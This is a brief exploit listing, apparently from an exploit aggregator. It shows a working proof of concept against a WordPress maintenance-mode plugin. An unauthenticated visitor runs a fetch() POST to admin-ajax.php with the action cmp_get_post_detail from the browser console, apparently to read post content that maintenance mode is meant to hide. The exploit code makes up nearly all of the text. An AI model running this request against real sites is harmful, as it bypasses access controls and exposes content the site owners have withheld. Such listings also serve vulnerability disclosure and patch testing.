Share
## https://sploitus.com/exploit?id=WPEX-ID:2E07FFD9-8E82-4078-96AA-162EF78C417B
Run the below command in the developer console of the web browser while being on the blog as unauthenticated, when maintenance mode is enabled

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'action=cmp_get_post_detail&id=42',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));